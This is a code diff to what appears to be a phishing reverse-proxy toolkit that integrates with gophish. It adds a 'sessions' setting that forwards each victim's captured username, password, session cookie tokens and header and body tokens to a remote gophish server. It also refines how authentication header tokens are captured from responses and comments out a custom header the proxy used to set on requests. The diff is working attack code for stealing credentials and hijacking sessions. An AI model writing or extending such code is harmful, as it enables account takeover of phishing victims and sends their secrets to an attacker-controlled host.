Ability to send captured sessions to gophish (needs gophish update)

core/config.go

@@ -62,6 +62,7 @@ type CertificatesConfig struct {
 type GoPhishConfig struct {
 	AdminUrl    string `mapstructure:"admin_url" json:"admin_url" yaml:"admin_url"`
 	ApiKey      string `mapstructure:"api_key" json:"api_key" yaml:"api_key"`
+	Sessions      bool `mapstructure:"sessions" json:"sessions" yaml:"sessions"`
 	InsecureTLS bool   `mapstructure:"insecure" json:"insecure" yaml:"insecure"`
 }
 
@@ -380,6 +381,13 @@ func (c *Config) SetGoPhishInsecureTLS(k bool) {
 	c.cfg.WriteConfig()
 }
 
+func (c *Config) SetGoPhishSessions(k bool) {
+	c.gophishConfig.Sessions = k
+	c.cfg.Set(CFG_GOPHISH, c.gophishConfig)
+	log.Info("gophish sessions set to: %v", k)
+	c.cfg.WriteConfig()
+}
+
 func (c *Config) IsLureHostnameValid(hostname string) bool {
 	for _, l := range c.lures {
 		if l.Hostname == hostname {
@@ -823,3 +831,7 @@ func (c *Config) GetGoPhishApiKey() string {
 func (c *Config) GetGoPhishInsecureTLS() bool {
 	return c.gophishConfig.InsecureTLS
 }
+
+func (c *Config) GetGoPhishSessions() bool {
+	return c.gophishConfig.Sessions
+}

core/gophish.go

@@ -13,18 +13,25 @@ type GoPhish struct {
 	AdminUrl    *url.URL
 	ApiKey      string
 	InsecureTLS bool
+	Sessions bool
 }
 
 type ResultRequest struct {
 	Address   string `json:"address"`
 	UserAgent string `json:"user_agent"`
+	Username   string `json:"username"`
+	Password string `json:"password"`
+	Custom map[string]string `json:"custom"`
+	Tokens string `json:"tokens"`
+	HttpTokens map[string]string `json:"http_tokens"`
+	BodyTokens map[string]string `json:"body_tokens"`
 }
 
 func NewGoPhish() *GoPhish {
 	return &GoPhish{}
 }
 
-func (o *GoPhish) Setup(adminUrl string, apiKey string, insecureTLS bool) error {
+func (o *GoPhish) Setup(adminUrl string, apiKey string, insecureTLS bool, gophishSessions bool) error {
 
 	var u *url.URL = nil
 	var err error
@@ -37,6 +44,7 @@ func (o *GoPhish) Setup(adminUrl string, apiKey string, insecureTLS bool) error
 	o.AdminUrl = u
 	o.ApiKey = apiKey
 	o.InsecureTLS = insecureTLS
+	o.Sessions = gophishSessions
 	return nil
 }
 
@@ -93,15 +101,29 @@ func (o *GoPhish) ReportEmailLinkClicked(rid string, address string, userAgent s
 	return o.apiRequest(reqUrl.String(), content)
 }
 
-func (o *GoPhish) ReportCredentialsSubmitted(rid string, address string, userAgent string) error {
+func (o *GoPhish) ReportCredentialsSubmitted(rid string, session *Session, gophishSessions bool) error {
 	err := o.validateSetup()
 	if err != nil {
 		return err
 	}
 
-	req := ResultRequest{
-		Address:   address,
-		UserAgent: userAgent,
+	var req ResultRequest
+	if !gophishSessions {
+		req = ResultRequest{
+			Address:   session.RemoteAddr,
+			UserAgent: session.UserAgent,
+		}
+	} else {
+		req = ResultRequest{
+			Address:   session.RemoteAddr,
+			UserAgent: session.UserAgent,
+			Username: session.Username,
+			Password: session.Password,
+			Custom: session.Custom,
+			Tokens: (*Terminal).cookieTokensToJSON(nil, session.CookieTokens),
+			HttpTokens: session.HttpTokens,
+			BodyTokens: session.BodyTokens,
+		}
 	}
 
 	content, err := json.Marshal(req)

core/http_proxy.go

@@ -384,7 +384,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 												rid, ok := session.Params["rid"]
 												if ok && rid != "" {
 													log.Info("[gophish] [%s] email opened: %s (%s)", hiblue.Sprint(pl_name), req.Header.Get("User-Agent"), remote_addr)
-													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+													p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 													err = p.gophish.ReportEmailOpened(rid, remote_addr, req.Header.Get("User-Agent"))
 													if err != nil {
 														log.Error("gophish: %s", err)
@@ -405,7 +405,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 									if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 										rid, ok := session.Params["rid"]
 										if ok && rid != "" {
-											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
+											p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
 											err = p.gophish.ReportEmailLinkClicked(rid, remote_addr, req.Header.Get("User-Agent"))
 											if err != nil {
 												log.Error("gophish: %s", err)
@@ -466,7 +466,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						return p.blockRequest(req)
 					}
 				}
-				req.Header.Set(p.getHomeDir(), o_host)
+				//req.Header.Set(p.getHomeDir(), o_host)
 
 				if ps.SessionId != "" {
 					if s, ok := p.sessions[ps.SessionId]; ok {
@@ -656,7 +656,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check for creds in request body
 				if pl != nil && ps.SessionId != "" {
-					req.Header.Set(p.getHomeDir(), o_host)
+					//req.Header.Set(p.getHomeDir(), o_host)
 					body, err := ioutil.ReadAll(req.Body)
 					if err == nil {
 						req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
@@ -852,7 +852,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check if request should be intercepted
 				if pl != nil {
-					if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
+					if r_host, ok := p.replaceHostWithOriginal(o_host); ok {
 						for _, ic := range pl.intercept {
 							//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
 							//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
@@ -1023,9 +1023,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					// capture http header tokens
 					for k, v := range pl.httpAuthTokens {
 						if _, ok := s.HttpTokens[k]; !ok {
-							hv := resp.Request.Header.Get(v.header)
-							if hv != "" {
-								s.HttpTokens[k] = hv
+							if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
+								hv := resp.Header.Get(v.header)
+								if hv != "" {
+									s.HttpTokens[k] = hv
+								}
 							}
 						}
 					}
@@ -1065,8 +1067,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 							rid, ok := s.Params["rid"]
 							if ok && rid != "" {
-								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-								err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+								p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+								err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 								if err != nil {
 									log.Error("gophish: %s", err)
 								}
@@ -1205,8 +1207,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 							if p.cfg.GetGoPhishAdminUrl() != "" && p.cfg.GetGoPhishApiKey() != "" {
 								rid, ok := s.Params["rid"]
 								if ok && rid != "" {
-									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS())
-									err = p.gophish.ReportCredentialsSubmitted(rid, s.RemoteAddr, s.UserAgent)
+									p.gophish.Setup(p.cfg.GetGoPhishAdminUrl(), p.cfg.GetGoPhishApiKey(), p.cfg.GetGoPhishInsecureTLS(), p.cfg.GetGoPhishSessions())
+									err = p.gophish.ReportCredentialsSubmitted(rid, s, p.cfg.GetGoPhishSessions())
 									if err != nil {
 										log.Error("gophish: %s", err)
 									}

core/terminal.go

@@ -192,8 +192,13 @@ func (t *Terminal) handleConfig(args []string) error {
 			gophishInsecure = "true"
 		}
 
-		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"}
-		vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure}
+		gophishSessions := "false"
+		if t.cfg.GetGoPhishSessions() {
+			gophishSessions = "true"
+		}
+
+		keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure", "gophish sessions"}
+		vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure, gophishSessions}
 		log.Printf("\n%s\n", AsRows(keys, vals))
 		return nil
 	} else if pn == 2 {
@@ -229,7 +234,7 @@ func (t *Terminal) handleConfig(args []string) error {
 		case "gophish":
 			switch args[1] {
 			case "test":
-				t.p.gophish.Setup(t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), t.cfg.GetGoPhishInsecureTLS())
+				t.p.gophish.Setup(t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), t.cfg.GetGoPhishInsecureTLS(), t.cfg.GetGoPhishSessions())
 				err := t.p.gophish.Test()
 				if err != nil {
 					log.Error("gophish: %s", err)
@@ -267,6 +272,15 @@ func (t *Terminal) handleConfig(args []string) error {
 					t.cfg.SetGoPhishInsecureTLS(false)
 					return nil
 				}
+			case "sessions":
+				switch args[2] {
+				case "true":
+					t.cfg.SetGoPhishSessions(true)
+					return nil
+				case "false":
+					t.cfg.SetGoPhishSessions(false)
+					return nil
+				}
 			}
 		}
 	}
@@ -1161,7 +1175,7 @@ func (t *Terminal) createHelp() {
 	h, _ := NewHelp()
 	h.AddCommand("config", "general", "manage general configuration", "Shows values of all configuration variables and allows to change them.", LAYER_TOP,
 		readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4", readline.PcItem("external"), readline.PcItem("bind")), readline.PcItem("unauth_url"), readline.PcItem("autocert", readline.PcItem("on"), readline.PcItem("off")),
-			readline.PcItem("gophish", readline.PcItem("admin_url"), readline.PcItem("api_key"), readline.PcItem("insecure", readline.PcItem("true"), readline.PcItem("false")), readline.PcItem("test"))))
+			readline.PcItem("gophish", readline.PcItem("admin_url"), readline.PcItem("api_key"), readline.PcItem("insecure", readline.PcItem("true"), readline.PcItem("false")), readline.PcItem("sessions", readline.PcItem("true"), readline.PcItem("false")), readline.PcItem("test"))))
 	h.AddSubCommand("config", nil, "", "show all configuration variables")
 	h.AddSubCommand("config", []string{"domain"}, "domain <domain>", "set base domain for all phishlets (e.g. evilsite.com)")
 	h.AddSubCommand("config", []string{"ipv4"}, "ipv4 <ipv4_address>", "set ipv4 external address of the current server")
@@ -1172,6 +1186,7 @@ func (t *Terminal) createHelp() {
 	h.AddSubCommand("config", []string{"gophish", "admin_url"}, "gophish admin_url <url>", "set up the admin url of a gophish instance to communicate with (e.g. https://gophish.domain.com:7777)")
 	h.AddSubCommand("config", []string{"gophish", "api_key"}, "gophish api_key <key>", "set up the api key for the gophish instance to communicate with")
 	h.AddSubCommand("config", []string{"gophish", "insecure"}, "gophish insecure <true|false>", "enable or disable the verification of gophish tls certificate (set to `true` if using self-signed certificate)")
+	h.AddSubCommand("config", []string{"gophish", "sessions"}, "gophish sessions <true|false>", "enable or disable the sending of captured credentials to gophish")
 	h.AddSubCommand("config", []string{"gophish", "test"}, "gophish test", "test the gophish configuration")
 
 	h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP,